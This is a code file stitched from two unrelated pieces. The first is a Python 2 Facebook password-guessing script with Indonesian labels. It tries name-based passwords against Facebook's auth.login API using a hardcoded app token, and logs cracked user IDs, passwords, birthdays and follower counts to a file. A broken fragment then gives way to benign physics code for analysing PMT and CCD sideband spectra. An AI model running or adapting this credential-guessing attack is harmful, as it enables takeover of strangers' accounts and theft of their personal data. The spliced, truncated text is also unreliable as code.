print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass4
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass4 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass4
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass4 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass4 + birthday + subscribers)
else:
pass5 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass5
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass5 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass5
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass5 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass5 + birthday + subscribers)
else:
pass6 = c['first_name'] + '321'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass6
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass6 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass6
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass6 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass6 + birthday + subscribers)
else:
pass7 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass7
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass7 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass7
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass7 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass7 + birthday + subscribers)
else:
pass8 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass8
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass8 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass8
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass8 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass8 + birthday + subscribers)
else:
pass9 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print | |
= None
for result in sorted(sb_fits.keys()):
try:
self.sb_results = np.vstack((self.sb_results, sb_fits[result]))
except:
self.sb_results = np.array(sb_fits[result])
self.sb_results = self.sb_results[:, [0, 1, 5, 2, 6, 3, 7, 4, 8]]
self.sb_results = self.sb_results[:, :7]
if verbose:
print("And the results, please:\n", self.sb_results)
self.full_dict = {}
for sb in self.sb_results:
self.full_dict[sb[0]] = np.asarray(sb[1:])
def laser_line(self, verbose=False):
    """
    This method is designed to scale everything in the PMT to the conversion
    efficiency based on our measurement of the laser line with a fixed
    attenuation.

    Creates:
        self.parameters['normalized?'] = Flag to specify if the laser has
            been accounted for.

    :param verbose: if True, print the laser-line row and strength used.
    :return: None
    """
    # Without a laser line (sideband order 0) there is nothing to
    # normalize against; record that and bail out.
    if 0 not in self.sb_list:
        self.parameters['normalized?'] = False
        return
    else:
        # Row of sb_results whose sideband order (column 0) is zero.
        laser_index = np.where(self.sb_results[:, 0] == 0)[0][0]
        if verbose:
            print("sb_results", self.sb_results[laser_index, :])
            print("laser_index", laser_index)
        # Columns 3:5 hold the laser line's strength and its error
        # (column 4 is treated as the error of column 3 below).
        laser_strength = np.array(self.sb_results[laser_index, 3:5])
        if verbose:
            print("Laser_strength", laser_strength)
        # NOTE: the error (index 4) must be updated *before* the value
        # (index 3) is overwritten, because the new error depends on the
        # old value. Relative errors combine in quadrature.
        for sb in self.sb_results:
            sb[4] = (sb[3] / laser_strength[0]) * np.sqrt(
                (sb[4] / sb[3]) ** 2 + (laser_strength[1] / laser_strength[0]) ** 2)
            sb[3] = sb[3] / laser_strength[0]
        # full_dict rows lack the leading order column, so the same fields
        # sit one index earlier (2 = value, 3 = error).
        for sb in list(self.full_dict.values()):
            sb[3] = (sb[2] / laser_strength[0]) * np.sqrt(
                (sb[3] / sb[2]) ** 2 + (laser_strength[1] / laser_strength[0]) ** 2)
            sb[2] = sb[2] / laser_strength[0]
        self.parameters['normalized?'] = True
def save_processing(self, file_name, folder_str, marker='', index=''):
    """
    Save the continuous spectrum (self.sb_dict) and the sideband fit
    details (self.sb_results) for this file.

    Format:
        spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
        fit_fname     = file_name + '_' + marker + '_' + str(index) + '_fits.txt'

    :param file_name: The base name for the saved file
    :type file_name: str
    :param folder_str: Folder the files are saved in; created if necessary
    :type folder_str: str
    :param marker: Marker for the file, appended to file_name, often
        self.parameters['series']
    :type marker: str
    :param index: used to keep these files from overwriting themselves when
        marker is the same
    :type index: str or int
    :return: None
    """
    try:
        os.mkdir(folder_str)
    except OSError as e:
        # An already-existing folder is fine; anything else is a real error.
        if e.errno != errno.EEXIST:
            raise
    spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
    fit_fname = file_name + '_' + marker + '_' + str(index) + '_fits.txt'
    self.save_name = spectra_fname
    try:
        parameter_str = json.dumps(self.parameters, sort_keys=True, indent=4,
                                   separators=(',', ': '))
    except (TypeError, ValueError):
        # Narrowed from a bare except: only JSON serialization failures
        # should abort the save.
        print("Source: PMT.save_images\nJSON FAILED")
        print("Here is the dictionary that broke JSON:\n", self.parameters)
        return
    parameter_str = parameter_str.replace('\n', '\n#')
    # Pad the header to a constant number of lines so importing is easier.
    num_lines = parameter_str.count('#')
    parameter_str += '\n#' * (99 - num_lines)
    origin_import_spec = '\nNIR frequency,Signal,Standard error\neV,arb. u.,arb. u.\n,{:.3f},'.format(
        self.parameters["fieldStrength"]["mean"])
    spec_header = '#' + parameter_str + origin_import_spec
    origin_import_fits = '\nCenter energy,error,Amplitude,error,Linewidth,error\neV,,arb. u.,,eV,,\n,,'  # + marker
    fits_header = '#' + parameter_str + origin_import_fits
    # Stack every sideband's data in sorted order. (Replaces the old
    # vstack-inside-try/bare-except accumulation, which silently masked
    # any real error during stacking.)
    complete = np.vstack([self.sb_dict[sideband]
                          for sideband in sorted(self.sb_dict.keys())])
    np.savetxt(os.path.join(folder_str, spectra_fname), complete, delimiter=',',
               header=spec_header, comments='', fmt='%0.6e')
    try:
        np.savetxt(os.path.join(folder_str, fit_fname), self.sb_results,
                   delimiter=',',
                   header=fits_header, comments='', fmt='%0.6e')
    except AttributeError:
        # Catch the error that happens if you save something without fits.
        print("warning, couldn't save fit file (no sidebands found?)")
    print("Saved PMT spectrum.\nDirectory: {}".format(
        os.path.join(folder_str, spectra_fname)))
class TimeTrace(PMT):
    """
    This class will be able to handle time traces output by the PMT software.
    """
    def __init__(self, file_path):
        # Bug fix: the super() call previously named HighSidebandPMT, which
        # is not in TimeTrace's MRO (TimeTrace derives directly from PMT),
        # so instantiation raised a TypeError. Name this class instead.
        super(TimeTrace, self).__init__(file_path)
class FullSpectrum(object):
    """Common base class for assembled full spectra; holds no shared state
    of its own."""
    def __init__(self):
        pass
class FullAbsorbance(FullSpectrum):
    """
    I'm imagining this will sew up absorption spectra, but I'm not at all sure
    how to do that at the moment.

    NOTE(review): currently a stub with no behavior beyond FullSpectrum.
    """
    def __init__(self):
        pass
class FullHighSideband(FullSpectrum):
"""
I'm imagining this class is created with a base CCD file, then gobbles up
other spectra that belong with it, then grabs the PMT object to normalize
everything, assuming that PMT object exists.
"""
def __init__(self, initial_CCD_piece):
"""
Initialize a full HSG spectrum. Starts with a single CCD image, then
adds more on to itself using stitch_hsg_dicts.
Creates:
self.fname = file name of the initial_CCD_piece
self.sb_results = The sideband details from the initializing data
self.parameters = The parameter dictionary of the initializing data. May
not have all details of spectrum pieces added later.
self.full_dict = a copy of the sb_results without the zeroth column, which
is SB order
:param initial_CCD_piece: The starting part of the spectrum, often the lowest orders seen by CCD
:type initial_CCD_piece: HighSidebandCCD
:return: None
"""
self.fname = initial_CCD_piece.fname
try:
self.sb_results = initial_CCD_piece.sb_results
except AttributeError:
print(initial_CCD_piece.full_dict)
raise
self.parameters = initial_CCD_piece.parameters
self.parameters['files_here'] = [initial_CCD_piece.fname.split('/')[-1]]
self.full_dict = {}
for sb in self.sb_results:
self.full_dict[sb[0]] = np.asarray(sb[1:])
@staticmethod
def parse_sb_array(arr):
    """
    Return (full_dict, arr) for a sideband array, dropping the first row
    when the first even-order sideband is weaker than the second.

    A weaker first even order typically means that sideband sat in the
    short-pass filter and isn't worth counting; cutting it keeps it from
    interfering with overlap calculations.

    :param arr: 2D array of sideband rows (column layout given by sbarr)
    :return: tuple of ({order: remaining columns}, possibly-trimmed array)
    """
    arr = np.array(arr)
    # Both orders positive, yet the first has the smaller area -> drop it.
    if (arr[0, sbarr.SBNUM] > 0 and arr[1, sbarr.SBNUM] > 0 and
            arr[0, sbarr.AREA] < arr[1, sbarr.AREA]):
        arr = arr[1:]
    full_dict = {row[0]: np.asarray(row[1:]) for row in arr}
    return full_dict, arr
def add_CCD(self, ccd_object, verbose=False, force_calc=None, **kwargs):
    """
    This method will be called by the stitch_hsg_results function to add another
    CCD image to the spectrum.

    :param ccd_object: The CCD object that will be stiched into the current
        FullHighSideband object
    :type ccd_object: HighSidebandCCD
    :param verbose: passed through to stitch_hsg_dicts
    :param force_calc: if not None, overrides the gain-based decision on
        whether a stitch ratio must be recalculated
    :return: None
    """
    # Recalculate the stitch ratio only when the two pieces were taken at
    # different gains; equal gains mean counts are directly comparable.
    if self.parameters["gain"] == ccd_object.parameters["gain"]:
        calc = False
    else:
        calc = True
    if force_calc is not None:
        calc = force_calc
    # A need_ratio kwarg (cascaded from callers) wins over both of the above.
    if "need_ratio" in kwargs:
        calc = kwargs.pop("need_ratio")
    try:
        self.full_dict = stitch_hsg_dicts(self, ccd_object, need_ratio=calc,
                                          verbose=verbose, **kwargs)
        self.parameters['files_here'].append(ccd_object.fname.split('/')[-1])
        # Rebuild sb_results from the merged dict: rows are [order, *details],
        # sorted by sideband order (column 0).
        sb_results = [[k]+list(v) for k, v in list(self.full_dict.items())]
        sb_results = np.array(sb_results)
        self.sb_results = sb_results[sb_results[:,0].argsort()]
    except AttributeError:
        # stitch_hsg_dicts failed on a piece with too few sidebands.
        print('Error, not enough sidebands to fit here! {}, {}, {}, {}'.format(
            self.parameters["series"], self.parameters["spec_step"],
            ccd_object.parameters["series"], ccd_object.parameters["spec_step"]
        ))
def add_PMT(self, pmt_object, verbose=False):
    """
    This method will be called by the stitch_hsg_results function to add the PMT
    data to the spectrum.

    Always requests need_ratio=True from stitch_hsg_dicts, records the PMT
    object's file list, and rebuilds sb_results from the merged dict.

    :param pmt_object: the PMT spectrum to stitch in
    :param verbose: passed through to stitch_hsg_dicts
    :return: None
    """
    self.full_dict = stitch_hsg_dicts(pmt_object, self,
                                      need_ratio=True, verbose=verbose)
    self.parameters['files_here'].append(pmt_object.parameters['files included'])
    self.make_results_array()
def make_results_array(self):
"""
The idea behind this method is to create the sb_results array from the
finished full_dict dictionary.
"""
self.sb_results = None
# print "I'm making the results array:", sorted(self.full_dict.keys())
for sb in sorted(self.full_dict.keys()):
